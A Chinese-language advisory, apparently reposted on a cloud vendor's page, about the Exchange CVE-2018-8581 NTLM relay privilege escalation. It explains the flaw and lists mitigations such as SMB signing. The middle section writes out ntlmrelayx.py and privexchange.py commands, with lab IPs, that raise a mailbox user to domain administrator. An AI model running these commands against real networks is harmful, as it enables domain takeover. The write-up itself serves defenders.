溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關Exchange CVE-2018-8581 提權漏洞預警是怎樣的,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
昨天,國外安全研究員 dirkjanm 通過博客文章公布了 Exchange 服務器上的一個提權漏洞的利用詳情,漏洞編號為 CVE-2018-8581,實際上該漏洞早于去年 12 月份由 ZERO DAY INITIATIVE 組織發布的一篇技術博客中批露。該漏洞利用了 Exchange 服務器的 SSRF 和高權限的請求,導致擁有合法郵箱憑證的用戶可以被提升至域管權限。目前,微軟對該漏洞并未發布任何補丁,只提供了緩解該攻擊的手法,但該方法也并不適用于所有的 Exchange 服務器。
Exchange 服務器是由微軟提供的郵件服務器,除了傳統的郵件基本功能外,在微軟背景下 Exchange 與活動目錄域服務和其他微軟相關服務和組件也有著眾多聯系。考慮到 Exchange 郵件服務器在企業環境中使用占比非常高,該漏洞影響范圍也比較廣,請用戶及時采取相應的應對措施。
Exchange 2010 ~ Exchange 2016
攻擊者通過已掌握的郵箱用戶憑證,可以在一定條件下將普通用戶提升至域管理員權限。
Exchange 默認配置下,攻擊者擁有合法的郵箱用戶憑證,同時,該漏洞利用是通過 NTLM 重放的方式進行提權,因此攻擊者需要已經在內網環境中取得可用主機。
該漏洞的發生源于幾個方面:
首先,Exchange 允許任意用戶(只要是通過了認證的)通過 EWS 接口來創建一個推送訂閱(Push Subscription),并可以指定任意 URL 作為通知推送的目的地;
其次,通知被訂閱推送后,當觸發推送時,Exchange 使用了 CredentialCache 類的 DefaultCredentials 屬性,由于 EWS 以 SYSTEM 權限運行,當使用 DefaultCredentials 時發出的 HTTP 請求將使用該權限發起 NTLM 認證;
在 EWS 請求中,通過在 Header 中使用 SerializedSecurityContext,指定 SID 可以實現身份偽裝,從而以指定用戶身份進行 EWS 調用操作。
上述問題導致普通郵箱用戶可以通過 EWS 高權限實現任意郵箱委托、查看等,這也是 ZDI 最先公布于博客中的漏洞詳情。
由于該漏洞利用涉及 NTLM 的重放攻擊,一種很容易想到的思路就是將該憑證重放到域控機器,這也是安全研究員 dirkjanm 在博客中提到的將 NTLM 重放到域控 LDAP 服務的利用方式。由于重放的 NTLM 憑證來自 Exchange 服務器的最高權限,利用該權限同時具備域內最高權限為普通用戶進行提權操作。
10.0.83.11 為攻擊者
10.0.83.93 為域控服務器
10.0.83.94 為 Exchange 服務器
執行如下命令:
ntlmrelayx.py -t ldap://10.0.83.93--escalate-user wangwu privexchange.py -ah 10.0.83.11 -u wangwu –ppassword --debug -d fb.com 10.0.83.94 –debug
ntlmrelayx.py 接收到請求,需要手動觸發通知推送,或則等待該推送超時,可以看到 wangwu 提權成功為域管理員。
微軟官方當時給出的緩解措施是,刪除注冊表中的一個鍵值 DisableLoopbackCheck:
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableLoopbackCheck /f
從緩解攻擊的角度出發,還可以在域控制器上啟用 SMB 的簽名校驗,這是防范 NTLM 重放攻擊較為有效的手法,具體如下:該種修復方式,實際上是限制了 NTLM 重放的,使得該種攻擊利用得的一定的緩解。這種修復方式的缺陷在于,當 Exchange 服務器的角色被拆分安裝,即,郵箱服務器角色和客戶端訪問服務器角色這兩個服務器角色未被安裝在同一臺服務器上時,該種修復方式無效。
HKEY_LOCAL_MACHIME\System\CurrentControlSet\Services\LanManServer\Paramete
參考上述注冊表位置,添加 EnableSecuritySignature 和 RequireSecuritySignature,并設置其值為 1,重啟操作系統。
以上就是Exchange CVE-2018-8581 提權漏洞預警是怎樣的,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
